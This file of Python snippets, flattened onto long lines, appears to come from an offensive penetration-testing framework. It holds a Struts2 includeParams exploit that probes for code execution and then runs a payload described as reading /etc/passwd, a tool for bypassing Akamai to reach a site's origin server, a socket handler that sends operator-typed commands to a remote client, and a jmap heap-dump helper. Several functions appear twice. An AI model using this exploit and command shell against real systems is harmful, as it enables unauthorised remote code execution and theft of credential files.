def do_get(self): self.send_response(200) from framework.utils.logger import logger logger( "info", "Download Detected! :: {0} {1} {2} {3}".format( self.command, self.path, self.protocol_version, 200)) self.end_headers()
def handle(self): try: if self.request.recv(1024).strip().decode("utf-8") == "ready": while True: command = input(t.green(">>> ")) self.request.sendall(bytes(command, "utf-8")) print(self.request.recv(2048).decode()) if command == 'quit': self.server._shutdown_request = True except Exception as error: # This is broad until I know what to catch logger("warning", "Error!") raise error
def do_bypass(self, ip): """ Bypass Akamai """ # Set some shit up first port = AuxiliaryEnums.HTTP_PORT address = (ip, port.value) url = self.target request = "GET / HTTP/1.1\r\nHost: {0}\r\n\r\n".format(url) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(address) s.send(request.encode()) data = s.recv(15) if "200" in data.decode('utf-8'): logger("info", "Origin Access Possible!") else: logger("warning", "Origin Access Not Possible! :: {0}".format(t.yellow(data.decode("utf-8")))) # Don't forget to close the socket s.close() except socket.error as e: # Handle some exceptions if e.errno != errno.ECONNREFUSED: logger("warning", "Connection Issue!") raise e else: logger("warning", "Socket Refused!") pass
def run(self): """ Run HTTP server """ httpd = socketserver.TCPServer((self.address, self.port), HTTPHandler) logger("info", "HTTP server started") try: httpd.handle_request() except Exception as e: logger("warning", "Problem starting HTTP server") raise e
def do_akaspy(args): """ Usage: akaspy origin target """ try: import framework.aux.akaspy as akaspy except ImportError as e: logger("warning", "Failure To Import Module!\n >>> {0}".format(e)) sys.exit(1) else: origin, target = args.split()[0], args.split()[1] run = akaspy.AkaspyAction(origin, target) run.check_origin()
def do_jmap(args): """ Usage: jmap {Number of Heap Dumps} {ProcessID} """ try: from framework.aux.jmap import JmapAction as jmap except ImportError as e: logger("warning", "Failure To Import Module!\n >>> {0}".format(e)) sys.exit(1) else: number, pid = args.split() run = jmap(int(number), pid) run.heap_dump()
def do_struts2(args): """ Usage: struts2 params """ try: import framework.modules.struts2.struts2_includeParams as struts2_params except ImportError as e: logger("warning", "Failure To Import Module!\n >>> {0}".format(e)) sys.exit(1) else: if args.split()[1] == "params": run = struts2_params.Struts2IncludeParamsAction( args.split()[0]) run.check_exec()
def xml_formatter(file): """ Correctly format any XML file for parsing operations """ try: from lxml import etree parser = etree.XMLParser(remove_blank_text=True, encoding="UTF-8", recover=True) document = etree.fromstring(file.read().encode("UTF-8"), parser=parser) # Returns xml document as a string return etree.tostring(document).decode("UTF-8") except ImportError: logger("warning", "Cannot import lmxl!") except etree.ParseError: logger("warning", "Cannot parse XML!")
def do_jnlp(args): """ Usage: jnlp /path/to/application.jnlp """ try: import framework.aux.jnlp_parser as jnlp except ImportError as e: logger("warning", "Failure To Import Module!\n >>> {0}".format(e)) sys.exit(1) else: try: with open(args.split()[0], "r+") as jnlp_file: run = jnlp.JNLPAction(f.xml_formatter(jnlp_file)) run.jnlp_parse() run.jnlp_download_jars() jnlp_file.close() except FileNotFoundError: logger("warning", "Cannot open file!")
def heap_dump(self): """ Perform heap dump on target PID """ try: for n in range(self.num): p = subprocess.Popen( "jmap -dump:format=b,file=heap{0}.bin {1}".format( str(n), self.pid), shell=True) p.wait() except subprocess.CalledProcessError: logger("warning", "Process error!") logger("warning", "Make sure jmap is in your path") except ValueError: logger("warning", "Argument error!")
self.request.sendall(bytes(command, "utf-8")) print(self.request.recv(2048).decode()) if command == 'quit': self.server._shutdown_request = True except Exception as error: # This is broad until I know what to catch logger("warning", "Error!") raise error if __name__ == "__main__": # Setup IP, and PORT IP, PORT = socket.gethostbyname(socket.gethostname()), 6666 try: server = socketserver.TCPServer((IP, PORT), Handler) server.serve_forever() except socket.error: logger("warning", "Could not create socket!") except OSError as e: logger("warning", "Cannot start handler!") raise e except KeyboardInterrupt: sys.exit(0)
def check_exec(self): """ Check Execution """ payload, param = parse.quote_plus( Struts2Enum.check.value), Struts2Enum.param.value target = ''.join("{0}{1}{2}".format(self.url, param, payload)) try: logger("info", "Checking target :: {0}".format(t.yellow(self.url))) r = requests.get(target) if r.status_code != 200: logger("warning", "Unexpected status code!") else: if r.text: html = Soup(r.text) response = html.find('slither').contents[0] if response == "pwn": logger( "info", "Code execution is possible! :: {0}".format( t.yellow(response))) self.fatality_exec() else: logger("warning", "Code is not possible!") else: logger("warning", "No HTTP response!") except requests.HTTPError: logger("warning", "HTTP error!") sys.exit(1) except requests.ConnectionError: logger("warning", "Connection error!") sys.exit(1)
def fatality_exec(self): """ Fatality Execution ('cat /etc/passwd') """ try: logger( "info", "Attempting execution :: {0}".format( t.yellow(Struts2Enum.fatality.value))) r = requests.get(''.join("{0}{1}{2}".format( self.url, Struts2Enum.param.value, parse.quote_plus(Struts2Enum.fatality.value)))) if r.status_code == 200: logger("info", "Execution success!") logger("info", ''.join(t.yellow(r.text))) else: logger("warning", "Unexpected status code!") except requests.HTTPError: logger("warning", "HTTP error!") sys.exit(1) except requests.ConnectionError: logger("warning", "HTTP error!") sys.exit(1)
def check_exec(self): """ Check Execution """ payload, param = parse.quote_plus(Struts2Enum.check.value), Struts2Enum.param.value target = ''.join("{0}{1}{2}".format(self.url, param, payload)) try: logger("info", "Checking Target :: {0}".format(t.yellow(self.url))) r = requests.get(target) if r.status_code != 200: logger("warning", "Unexpected Status Code!") else: if r.text: html = Soup(r.text) response = html.find('slither').contents[0] if response == "pwn": logger("info", "Code Execution Possible! :: {0}".format(t.yellow(response))) self.fatality_exec() else: logger("warning", "Code Execution Not Possible!") else: logger("warning", "No HTTP Response!") except requests.HTTPError: logger("warning", "HTTP Error") sys.exit(1) except requests.ConnectionError: logger("warning", "Connection Error!") sys.exit(1)
class HTTPServer(object): def __init__(self, address, port): self.address = address self.port = int(port) def run(self): """ Run HTTP server """ httpd = socketserver.TCPServer((self.address, self.port), HTTPHandler) logger("info", "HTTP server started") try: httpd.handle_request() except Exception as e: logger("warning", "Problem starting HTTP server") raise e if __name__ == '__main__': try: server = HTTPServer("0.0.0.0", 8000) server.run() except KeyboardInterrupt: logger("warning", "Exiting HTTP server!") sys.exit(0)
def check_origin(self): """ Check the origin """ try: # Set some shit up first answer = dns.resolver.query(self.domain) if answer.qname == answer.canonical_name: logger("warning", "Incorrect DNS Record :: {0}".format(t.yellow(str(answer.qname)))) logger("info", "Origin Not Accessible!") else: logger("info", "Retrieved An Alias! :: {0}".format(t.yellow(str(answer.canonical_name)))) response = dns.resolver.query(answer.canonical_name, 'A') for response_data in response: ip = response_data.address if ip: logger("info", "Getting IP Address :: {0}".format(t.yellow(ip))) self.do_bypass(ip) except dns.resolver.NXDOMAIN: logger("warning", "Domain Not Found!") pass except dns.resolver.Timeout: logger("warning", "Query Timed Out!") pass except dns.exception.DNSException: logger("warning", "DNS Exception!") pass
def fatality_exec(self): """ Fatality Execution ('cat /etc/passwd') """ try: logger("info", "Attempting Execution :: {0}".format(t.yellow(Struts2Enum.fatality.value))) r = requests.get(''.join("{0}{1}{2}".format(self.url, Struts2Enum.param.value, parse.quote_plus(Struts2Enum.fatality.value)))) if r.status_code == 200: logger("info", "Execution Success!") logger("info", ''.join(t.yellow(r.text))) else: logger("warning", "Unexpected Status Code!") except requests.HTTPError: logger("warning", "HTTP Error") sys.exit(1) except requests.ConnectionError: logger("warning", "HTTP Error") sys.exit(1)